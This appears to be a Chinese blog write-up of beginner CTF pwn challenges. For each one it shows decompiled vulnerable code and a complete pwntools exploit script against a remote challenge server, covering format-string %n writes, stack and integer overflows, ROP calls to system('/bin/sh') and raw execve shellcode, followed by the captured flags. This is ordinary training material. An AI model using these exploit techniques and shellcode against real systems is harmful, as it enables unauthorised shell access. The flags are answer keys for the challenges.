攻防世界PWN新手练习区题目

攻防世界PWN新手练习区题目

get_shell

直接nc连接cat flag即可:

1
cyberpeace{d1070f116850587b8304cd1aa55565e6}

CGfsb

格式化字符串漏洞,漏洞讲解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
int __cdecl main(int argc, const char **argv, const char **envp)
{
int buf; // [esp+1Eh] [ebp-7Eh]
int v5; // [esp+22h] [ebp-7Ah]
__int16 v6; // [esp+26h] [ebp-76h]
char s; // [esp+28h] [ebp-74h]
unsigned int v8; // [esp+8Ch] [ebp-10h]

v8 = __readgsdword(0x14u);
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
buf = 0;
v5 = 0;
v6 = 0;
memset(&s, 0, 0x64u);
puts("please tell me your name:");
read(0, &buf, 0xAu);
puts("leave your message please:");
fgets(&s, 100, stdin);
printf("hello %s", &buf);
puts("your message is:");
printf(&s);
if ( pwnme == 8 )
{
puts("you pwned me, here is your flag:\n");
system("cat flag");
}
else
{
puts("Thank you!");
}
return 0;
}

使用%x定位位置

1
2
3
4
5
6
7
8
9
 ⚡ root@kali ~ nc 111.198.29.45 59649
please tell me your name:
hvnt3r
leave your message please:
aaaa%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.
hello hvnt3r
your message is:
aaaaffba298e.f77c55a0.f0b5ff.ffba29be.1.c2.766848fb.7233746e.a.61616161.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
Thank you!

定位到printf第一个参数位置位于10,构造脚本,使用%n进行数据写入,需要将pwnme修改为8,因此%n之前有8个字节,使用%10$n定位到第十个偏移量。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

p = remote('111.198.29.45', 59649)
pwnme = 0x0804A068

payload1 = 'qwer'
payload2 = p32(pwnme) + 'aaaa%10$n'

p.recvuntil('please tell me your name:\n')
p.sendline(payload1)
p.recvuntil('leave your message please:\n')
p.sendline(payload2)
print(p.recv())
print(p.recv())

flag

1
cyberpeace{7a11a088e83dfd9525a7f575eb43bbe4}

when_did_you_born

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
__int64 result; // rax
char v4; // [rsp+0h] [rbp-20h]
unsigned int v5; // [rsp+8h] [rbp-18h]
unsigned __int64 v6; // [rsp+18h] [rbp-8h]

v6 = __readfsqword(0x28u);
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
puts("What's Your Birth?");
__isoc99_scanf("%d", &v5);
while ( getchar() != 10 )
;
if ( v5 == 1926 )
{
puts("You Cannot Born In 1926!");
result = 0LL;
}
else
{
puts("What's Your Name?");
gets(&v4);
printf("You Are Born In %d\n", v5);
if ( v5 == 1926 )
{
puts("You Shall Have Flag.");
system("cat flag");
}
else
{
puts("You Are Naive.");
puts("You Speed One Second Here.");
}
result = 0LL;
}
return result;
}

溢出,脚本:

1
2
3
4
5
6
7
8
9
10
from pwn import *

io = remote('111.198.29.45', 34190)
age = p64(1926)

io.recvuntil('What\'s Your Birth?\n')
io.sendline(str(1))
io.recvuntil('What\'s Your Name?\n')
io.sendline('A' * 8 + age)
print(io.recv())

flag

1
cyberpeace{480d5559a5da195d0d304031d1ca79ad}

hello_pwn

1
2
3
4
5
6
7
8
9
10
11
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
alarm(0x3Cu);
setbuf(stdout, 0LL);
puts("~~ welcome to ctf ~~ ");
puts("lets get helloworld for bof");
read(0, &unk_601068, 0x10uLL);
if ( dword_60106C == 'nuaa' )
sub_400686(0LL, &unk_601068);
return 0LL;
}

溢出,脚本:

1
2
3
4
5
6
7
8
9
from pwn import *

io = remote('111.198.29.45', 41373)

nuaa = p32(0x6E756161)

io.recvuntil('lets get helloworld for bof\n')
io.sendline('A' * 4 + nuaa)
print(io.recv())

flag

1
cyberpeace{907d57b451589b80d32b742492ffc357}

level0

1
2
3
4
5
6
ssize_t vulnerable_function()
{
char buf; // [rsp+0h] [rbp-80h]

return read(0, &buf, 512uLL);
}

脚本:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

io = remote('111.198.29.45', 39085)

eip = p64(0x400596)
payload = 'A' * (128 + 8) + eip

io.recvuntil('World\n')
io.sendline(payload)

io.interactive()

flag

1
cyberpeace{0a5428dc9d0fc7b09735439513d590f0}

level2

ROP利用

1
2
3
4
5
6
7
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]

system("echo Input:");
return read(0, &buf, 0x100u);
}

题目中system与bin/sh都已经准备好了

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *

io = remote('111.198.29.45', 57085)

bin_sh = p32(0x0804A024)
sys_addr = p32(0x08048320)
payload = 'A' * (0x88 + 4) + sys_addr + 'A' * 4 + bin_sh

io.recvuntil('Input:\n')
io.sendline(payload)

io.interactive()

flag

1
cyberpeace{e626f78a0fd99bf06f22535c5a1eb7d2}

guess_num

考察溢出、伪随机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
from ctypes import *

io = remote('111.198.29.45', 59754)

elf = ELF('./guess')
print(elf.libc)

libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = "a" * 0x20 + p64(1)
io.recvuntil('Your name:')
io.sendline(payload)
libc.srand(1)
for i in range(10):
num = str(libc.rand()%6+1)
io.recvuntil('number:')
io.sendline(num)

io.interactive()

flag

1
cyberpeace{a6baa716374124aa6541575346d33ebf}

cgpwn2

rop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

io = remote('111.198.29.45', 55082)

system_addr = 0x0804855A
bin_sh_addr = 0x0804A080

payload = "a" * (0x26 + 4) + p32(system_addr) + p32(bin_sh_addr)
io.recvuntil('name')
io.sendline('/bin/sh')
io.recvuntil('here:')
io.sendline(payload)

io.interactive()

flag

1
cyberpeace{f27da510570ddc37586e1c3a6ff92d22}

这里记录一下构造栈帧的点,system的地址可以用以下两个:

  • 第一种
1
2
.plt:08048420                 jmp     ds:off_804A01C
.plt:08048420 _system endp

对应的payload:

1
payload = "a" * (0x26 + 4) + p32(system_addr) + p32(0) + p32(bin_sh_addr)

对应栈帧分布:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
[----------------------------------registers-----------------------------------]
EAX: 0x56559000 --> 0x3efc
EBX: 0x56559000 --> 0x3efc
ECX: 0xffffd310 --> 0x1
EDX: 0x56557008 ("/bin/sh")
ESI: 0xf7fa4000 --> 0x1d5d8c
EDI: 0x0
EBP: 0xffffd2f8 --> 0x0
ESP: 0xffffd2dc --> 0x565561d3 (<main+42>: add esp,0x10)
EIP: 0x56556046 (<system@plt+6>: push 0x0)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x5655603c: add BYTE PTR [eax],al
0x5655603e: add BYTE PTR [eax],al
0x56556040 <system@plt>: jmp DWORD PTR [ebx+0xc]
=> 0x56556046 <system@plt+6>: push 0x0
0x5655604b <system@plt+11>: jmp 0x56556030
0x56556050 <__libc_start_main@plt>: jmp DWORD PTR [ebx+0x10]
0x56556056 <__libc_start_main@plt+6>: push 0x8
0x5655605b <__libc_start_main@plt+11>: jmp 0x56556030
[------------------------------------stack-------------------------------------]
0000| 0xffffd2dc --> 0x565561d3 (<main+42>: add esp,0x10)
0004| 0xffffd2e0 --> 0x56557008 ("/bin/sh")
0008| 0xffffd2e4 --> 0xffffd3a4 --> 0xffffd540 ("/root/a.out")
0012| 0xffffd2e8 --> 0xffffd3ac --> 0xffffd54c ("LANG=zh_CN.UTF-8")
0016| 0xffffd2ec --> 0x565561bd (<main+20>: add eax,0x2e43)
0020| 0xffffd2f0 --> 0xffffd310 --> 0x1
0024| 0xffffd2f4 --> 0x0
0028| 0xffffd2f8 --> 0x0
[------------------------------------------------------------------------------]
  • 第二种
1
2
3
.text:08048553                 mov     dword ptr [esp], offset command ; "echo hehehe"
.text:0804855A call _system
.text:0804855F nop

对应的payload:

1
payload = "a" * (0x26 + 4) + p32(system_addr) + p32(bin_sh_addr)

对应栈帧分布情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[----------------------------------registers-----------------------------------]
EAX: 0x56559000 --> 0x3efc
EBX: 0x56559000 --> 0x3efc
ECX: 0xffffd310 --> 0x1
EDX: 0x56557008 ("/bin/sh")
ESI: 0xf7fa4000 --> 0x1d5d8c
EDI: 0x0
EBP: 0xffffd2f8 --> 0x0
ESP: 0xffffd2e0 --> 0x56557008 ("/bin/sh")
EIP: 0x565561ce (<main+37>: call 0x56556040 <system@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x565561c5 <main+28>: lea edx,[eax-0x1ff8]
0x565561cb <main+34>: push edx
0x565561cc <main+35>: mov ebx,eax
=> 0x565561ce <main+37>: call 0x56556040 <system@plt>
0x565561d3 <main+42>: add esp,0x10
0x565561d6 <main+45>: mov eax,0x0
0x565561db <main+50>: lea esp,[ebp-0x8]
0x565561de <main+53>: pop ecx
Guessed arguments:
arg[0]: 0x56557008 ("/bin/sh")
[------------------------------------stack-------------------------------------]
0000| 0xffffd2e0 --> 0x56557008 ("/bin/sh")
0004| 0xffffd2e4 --> 0xffffd3a4 --> 0xffffd540 ("/root/a.out")
0008| 0xffffd2e8 --> 0xffffd3ac --> 0xffffd54c ("LANG=zh_CN.UTF-8")
0012| 0xffffd2ec --> 0x565561bd (<main+20>: add eax,0x2e43)
0016| 0xffffd2f0 --> 0xffffd310 --> 0x1
0020| 0xffffd2f4 --> 0x0
0024| 0xffffd2f8 --> 0x0
0028| 0xffffd2fc --> 0xf7de79a1 (<__libc_start_main+241>: add esp,0x10)
[------------------------------------------------------------------------------]

总的来说就是两个system处于不同的函数栈帧中,所以一个payload需要多构造4个字节的padding来填充system返回地址,而另一个不需要。

int_overflow

整数溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *

context.log_level = 'debug'

io = remote('111.198.29.45', 30567)

cat_flag = 0x08048694

payload = "a" * 24
payload += p32(cat_flag)
payload += "a" * (260 - 24 - 4)

io.recvuntil('Your choice:')
io.sendline('1')
io.recvuntil('Please input your username:')
io.sendline('Hvnt3r')
io.recvuntil('Please input your passwd:')
io.sendline(payload)

print(io.recv())
print(io.recv())

flag

1
cyberpeace{1ca6cd8943a40dc6698ef90a5c1f4cc6}

string

格式化字符串漏洞,现实少见,比赛多见

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
unsigned __int64 sub_400BB9()
{
int v1; // [rsp+4h] [rbp-7Ch]
__int64 v2; // [rsp+8h] [rbp-78h]
char format; // [rsp+10h] [rbp-70h]
unsigned __int64 v4; // [rsp+78h] [rbp-8h]

v4 = __readfsqword(0x28u);
v2 = 0LL;
puts("You travel a short distance east.That's odd, anyone disappear suddenly");
puts(", what happend?! You just travel , and find another hole");
puts("You recall, a big black hole will suckk you into it! Know what should you do?");
puts("go into there(1), or leave(0)?:");
_isoc99_scanf("%d", &v1);
if ( v1 == 1 )
{
puts("A voice heard in your mind");
puts("'Give me an address'");
_isoc99_scanf("%ld", &v2);
puts("And, you wish is:");
_isoc99_scanf("%s", &format); <====== Here
puts("Your wish is");
printf(&format, &format); <====== Here
puts("I hear it, I hear it....");
}
return __readfsqword(0x28u) ^ v4;
}

通过%x看偏移,其实不用着这种方法也能知道,64位函数参数前六个参数再寄存器中,第7个参数在栈中,下面给出的secret[0] is 11cc010,通过%x确认偏移为7

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
we are wizard, we will give you hand, you can not defeat dragon by yourself ...
we will tell you two secret ...
secret[0] is 11cc010
secret[1] is 11cc014
do not tell anyone
What should your character's name be:
asd
Creating a new player.
This is a famous but quite unusual inn. The air is fresh and the
marble-tiled ground is clean. Few rowdy guests can be seen, and the
furniture looks undamaged by brawls, which are very common in other pubs
all around the world. The decoration looks extremely valuable and would fit
into a palace, but in this city it's quite ordinary. In the middle of the
room are velvet covered chairs and benches, which surround large oaken
tables. A large sign is fixed to the northern wall behind a wooden bar. In
one corner you notice a fireplace.
There are two obvious exits: east, up.
But strange thing is ,no one there.
So, where you will go?east or up?:
east
You travel a short distance east.That's odd, anyone disappear suddenly
, what happend?! You just travel , and find another hole
You recall, a big black hole will suckk you into it! Know what should you do?
go into there(1), or leave(0)?:
1
A voice heard in your mind
'Give me an address'
18661392
And, you wish is:
%x.%x.%x.%x.%x.%x.%x.%x.%x.
Your wish is
ea3c76a3.ea3c8780.ea0f92c0.ea5ef700.ea5ef700.22.11cc010.252e7825.2e78252e.I hear it, I hear it....
Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!
Dragon say: HaHa! you were supposed to have a normal
RPG game, but I have changed it! you have no weapon and
skill! you could not defeat me !
That's sound terrible! you meet final boss!but you level is ONE!

而且这个题中有一个强制类型转换:

1
2
3
4
puts("Wizard: I will help you! USE YOU SPELL");
v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);
read(0, v1, 0x100uLL);
((void (__fastcall *)(_QWORD, void *))v1)(0LL, v1); <====

用户输入会被直接执行,这里就放入shellcode。

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *

context.log_level = 'debug'

io = remote('111.198.29.45', 36839)

io.recvuntil("secret[0] is ")
arr_addr = int(io.recvuntil("\n")[:-1], 16)

payload = asm(shellcraft.sh())
payload2 = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"

io.recvuntil('What should your character\'s name be:')
io.sendline('hvnt3r')
io.recvuntil('So, where you will go?east or up?:')
io.sendline('east')
io.recvuntil('go into there(1), or leave(0)?:')
io.sendline('1')
io.recvuntil('\'Give me an address\'')
io.sendline(str(arr_addr))
io.recvuntil('And, you wish is:')
io.sendline('%85c%7$n')
io.recvuntil('Wizard: I will help you! USE YOU SPELL')
io.sendline(payload2)

io.interactive()

flag

1
cyberpeace{e835aafd1184958de3f7727a97536540}

level3

ret2libc

Pwntools之DynELF原理探究

flag

1
cyberpeace{a37050cd56a9dc4f19b4caff856ef86f}

最近工作很忙真是抽不出时间更新博客呢🙃

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×